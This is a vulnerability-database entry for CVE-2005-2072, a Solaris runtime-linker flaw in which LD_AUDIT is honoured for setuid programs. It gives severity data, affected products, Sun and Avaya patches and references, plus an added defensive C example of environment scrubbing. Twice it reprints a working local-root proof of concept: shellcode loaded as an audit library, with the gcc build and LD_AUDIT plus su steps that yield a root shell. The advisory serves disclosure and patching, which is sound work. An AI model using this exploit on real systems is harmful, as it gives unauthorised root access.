CVE-2005-2072
CVSS 7.2
Published: 2005-06-29 00:00:00
Revised: 2011-10-11 00:00:00

[Original] The runtime linker (ld.so) in Solaris 8, 9, and 10 trusts the LD_AUDIT environment variable in setuid or setgid programs, which allows local users to gain privileges by (1) modifying LD_AUDIT to reference malicious code and possibly (2) using a long value for LD_AUDIT.


[CNNVD] Sun Solaris Privilege Escalation Vulnerability (CNNVD-200506-240)

        Solaris is a commercial UNIX operating system developed and maintained by Sun.
        The Sun Solaris runtime linker does not properly check certain environment variables; a local attacker may exploit this to elevate their privileges.
        The cause is that ld.so on Solaris 9 and 10 does not check the LD_AUDIT environment variable when running s[ug]id binaries, which allows arbitrary code to run with elevated privileges.

- CVSS (base score)

CVSS score: 7.2 [Severe (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may result in complete system shutdown]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CWE (weakness category)

CWE-264 [Permissions, Privileges, and Access Controls]

- CPE (affected platforms and products)

cpe:/o:sun:solaris:9.0::sparc
cpe:/o:sun:solaris:10.0::sparc
cpe:/o:sun:solaris:8.0
cpe:/o:sun:solaris:9.0::x86
cpe:/o:sun:solaris:8.0::x86

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2072
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2072
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200506-240
(official data source) CNNVD

- Other links and resources

http://www.vupen.com/english/advisories/2005/0908
(VENDOR_ADVISORY)  VUPEN  ADV-2005-0908
http://www.securityfocus.com/bid/14074
(UNKNOWN)  BID  14074
http://www.opensolaris.org/jive/thread.jspa?messageID=3497
(UNKNOWN)  CONFIRM  http://www.opensolaris.org/jive/thread.jspa?messageID=3497
http://sunsolve.sun.com/search/document.do?assetkey=1-26-101794-1
(UNKNOWN)  SUNALERT  101794
http://securitytracker.com/id?1014537
(UNKNOWN)  SECTRACK  1014537
http://secunia.com/advisories/15841
(VENDOR_ADVISORY)  SECUNIA  15841
http://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034738.html
(UNKNOWN)  FULLDISC  20050628 Solaris 9/10 ld.so fun
http://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034731.html
(UNKNOWN)  FULLDISC  20050628 Solaris 9/10 ld.so fun
http://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034730.html
(UNKNOWN)  FULLDISC  20050628 Solaris 9/10 ld.so fun

- Vulnerability information

Sun Solaris Privilege Escalation Vulnerability
High risk  Permissions, privileges and access control
2005-06-29 00:00:00 2006-06-15 00:00:00
Local
        Solaris is a commercial UNIX operating system developed and maintained by Sun.
        The Sun Solaris runtime linker does not properly check certain environment variables; a local attacker may exploit this to elevate their privileges.
        The cause is that ld.so on Solaris 9 and 10 does not check the LD_AUDIT environment variable when running s[ug]id binaries, which allows arbitrary code to run with elevated privileges.

- Advisories and patches

        The vendor has released an upgrade patch to fix this security issue; patch download link:
        http://sunsolve.sun.com/security

- Vulnerability information (1073)

Solaris 9 / 10 ld.so Local Root Exploit (1) (EDBID:1073)
solaris local
2005-06-28 Verified
0 Przemyslaw Frasunek
N/A
/*
- SunOS 5.10 Generic i86pc i386 i86pc
- SunOS 5.9 Generic_112233-12 sun4u

It does NOT work on:

SunOS 5.8 Generic_117350-02 sun4u sparc

Example on unpatched Solaris 10 (AMD64):

atari:venglin:~> cat dupa.c
*/

static char sh[] =
"\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff\x9a\x01\x01\x01\x01\x07\x01\xc3\x50\xb0\x17\xe8\xf0\xff\xff\xff\x31\xc0\x68\x2f\x73\x68\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07\x89\xe3\x50\x53\x8d\x0c\x24\x8d\x54\x24\x04\x52\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xff";

int la_version() {
       void (*f)();
       f = (void*)sh;
       f();
       return 3;
}

/*
atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c
atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so
atari:venglin:~> su

# id
uid=0(root) gid=10(staff)
*/

// milw0rm.com [2005-06-28]

- Vulnerability information

17614
Solaris Runtime Linker (ld.so.1) Arbitrary Privileged Code Execution
Local Access Required Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- Vulnerability description

A local overflow exists in Sun Solaris Runtime Linker. The runtime linker, ld.so.1, fails to check the LD_AUDIT environment variable resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code with elevated privileges resulting in a loss of confidentiality and/or integrity.

- Timeline

2005-06-27 Unknown
2005-06-27 Unknown

- Solution

Upgrade to version as indicated by vendor advisory, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Vulnerability information

Sun Solaris Runtime Linker LD_AUDIT Privilege Escalation Vulnerability
Design Error 14074
No Yes
2005-06-28 12:00:00 2007-11-15 12:38:00
Przemyslaw Frasunek <venglin@freebsd.lublin.pl> is credited with the discovery of this vulnerability.

- Affected program versions

Sun Solaris 9_x86
Sun Solaris 9
Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 10.0_x86
Sun Solaris 10
SchilliX SchilliX 0.1
Avaya Interactive Response 1.3
Avaya Interactive Response 1.2.1
Avaya Interactive Response
Avaya CMS Server 13.0
Avaya CMS Server 12.0
Avaya CMS Server 11.0
Avaya CMS Server 9.0
Avaya CMS Server 8.0

- Vulnerability discussion

The Sun Solaris runtime linker is susceptible to a privilege escalation vulnerability.

Runtime linkers in most operating systems are designed to ignore LD_* environment variables when executing setuid or setgid binaries. The manual page describing 'ld.so' for Sun Solaris also states that certain precautions are taken when setuid or setgid binaries are executed. Reportedly, these precautions are not properly followed when LD_AUDIT is used.

Exploiting this vulnerability allows local attackers to gain superuser privileges on affected computers.
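The discussion above describes the precaution a runtime linker is expected to take: when the real and effective credentials of the new image differ, it must not honour the LD_* variables it inherited. The C program below is an added illustration of that secure-execution filter; it is not code from the advisory, from Sun, or from the Solaris ld.so sources. The two variable lists and the sample environment are constructed for the example (the "incomplete" list omits LD_AUDIT, modelling the behaviour the advisory describes; the "fixed" list includes it), and the names `filter_env`, `is_unsafe_var` and `running_set_id` are assumptions of this example, not real ld.so interfaces.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Constructed lists for this example: variables a runtime linker must ignore
 * when the image runs set-uid/set-gid. INCOMPLETE_UNSAFE_VARS models the
 * behaviour the advisory describes (LD_AUDIT not filtered); FIXED_UNSAFE_VARS
 * adds it. Neither list is Solaris's actual list. */
static const char *const INCOMPLETE_UNSAFE_VARS[] = { "LD_PRELOAD", "LD_LIBRARY_PATH" };
static const char *const FIXED_UNSAFE_VARS[]      = { "LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT" };

#define COUNT(a) (sizeof(a) / sizeof((a)[0]))

/* True when a "NAME=value" entry carries exactly the variable `name`
 * (prefix match alone would wrongly catch e.g. LD_AUDITX). */
static bool entry_has_name(const char *entry, const char *name) {
    size_t n = strlen(name);
    return strncmp(entry, name, n) == 0 && entry[n] == '=';
}

/* True if `entry` names one of the `n` variables in `unsafe`. */
bool is_unsafe_var(const char *entry, const char *const unsafe[], size_t n) {
    for (size_t i = 0; i < n; i++)
        if (entry_has_name(entry, unsafe[i])) return true;
    return false;
}

/* Secure-execution filter. Copies entries of the NULL-terminated `envp` into
 * `out` (capacity `cap`, including the terminating NULL). When `secure` is
 * true, entries named in `unsafe` are dropped before anything is loaded on
 * behalf of the program. Returns the number of entries kept. */
size_t filter_env(char *const envp[], bool secure,
                  const char *const unsafe[], size_t n_unsafe,
                  const char *out[], size_t cap) {
    size_t kept = 0;
    for (size_t i = 0; envp[i] != NULL && kept + 1 < cap; i++) {
        if (secure && is_unsafe_var(envp[i], unsafe, n_unsafe)) continue;
        out[kept++] = envp[i];
    }
    out[kept] = NULL;
    return kept;
}

/* The condition under which a linker must enter secure mode: the real and
 * effective credentials differ, i.e. the program is set-uid or set-gid. */
bool running_set_id(void) {
    return getuid() != geteuid() || getgid() != getegid();
}

/* Constructed sample environment, as a set-id program might inherit it. */
static char *const SAMPLE_ENV[] = {
    "PATH=/usr/bin:/bin",
    "LD_AUDIT=/tmp/untrusted.so",
    "HOME=/home/user",
    "LD_PRELOAD=/tmp/untrusted.so",
    NULL
};

/* Number of SAMPLE_ENV entries that survive the filter. */
size_t kept_count(bool secure, const char *const unsafe[], size_t n_unsafe) {
    const char *out[8];
    return filter_env(SAMPLE_ENV, secure, unsafe, n_unsafe, out, COUNT(out));
}

/* Does LD_AUDIT still reach the linker after filtering in secure mode? */
bool ld_audit_survives(const char *const unsafe[], size_t n_unsafe) {
    const char *out[8];
    filter_env(SAMPLE_ENV, true, unsafe, n_unsafe, out, COUNT(out));
    for (size_t i = 0; out[i] != NULL; i++)
        if (entry_has_name(out[i], "LD_AUDIT")) return true;
    return false;
}

int main(void) {
    printf("this process is set-id: %s\n", running_set_id() ? "yes" : "no");
    printf("incomplete filter keeps LD_AUDIT: %s\n",
           ld_audit_survives(INCOMPLETE_UNSAFE_VARS, COUNT(INCOMPLETE_UNSAFE_VARS)) ? "yes" : "no");
    printf("fixed filter keeps LD_AUDIT:      %s\n",
           ld_audit_survives(FIXED_UNSAFE_VARS, COUNT(FIXED_UNSAFE_VARS)) ? "yes" : "no");
    return 0;
}
```

The point the example makes is that the secure-mode check is only as good as the list it consults: a loader that scrubs LD_PRELOAD and LD_LIBRARY_PATH but leaves LD_AUDIT in place still loads attacker-chosen code into a set-id process, which is exactly the gap this advisory reports. A defender reviewing a loader or a privileged launcher should confirm that every variable capable of naming a shared object is on the scrubbed list, and that the scrub happens before any library is mapped.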

- Exploit

An exploit is not required, but proof-of-concept demonstration code was provided.

For Solaris 10 on amd64:
static char sh[] =
"\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff\x9a\x01\x01\x01\x01\x07\x01\xc3\x50\xb0\x17\xe8\xf0\xff\xff\xff\x31\xc0\x68\x2f\x73\x68\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07\x89\xe3\x50\x53\x8d\x0c\x24\x8d\x54\x24\x04\x52\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xff";

int la_version() {
void (*f)();
f = (void*)sh;
f();
return 3;
}

For Solaris 9 SPARC:
char sh[] =
/* setuid() */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
/* execve() */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";

int la_version() {
void (*f)();
f = (void*)sh;
f();
return 3;
}

To compile:
gcc -fPIC -shared -o /tmp/dupa.so dupa.c

And to exploit:
export LD_AUDIT=/tmp/dupa.so
su

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The following proof of concept (Schily-Root.tar) has been provided by KF (lists) (kf_lists@digitalmunition.com) for SchilliX:

- Solution

Sun has updated Sun Alert ID 101794 as well as fixes for Solaris 8 and 9 for both x86 and SPARC platforms, and a fix for Solaris 10 on the SPARC platform.

Sun has provided Interim Diagnostic Relief patch IDR120360-01 to address this issue for Solaris 10 on the x86 platform. Please see the referenced advisory for more information.

Avaya has released advisory ASA-2005-162 to identify vulnerable Avaya packages. Avaya is currently investigating this issue; more information about fixes will be released in the future.

Sun patch 118345-05 for Solaris 10 x86 has been released.


Sun Solaris 8_x86

Sun Solaris 8_sparc

Sun Solaris 9

Sun Solaris 9_x86

Sun Solaris 10

Sun Solaris 10.0_x86
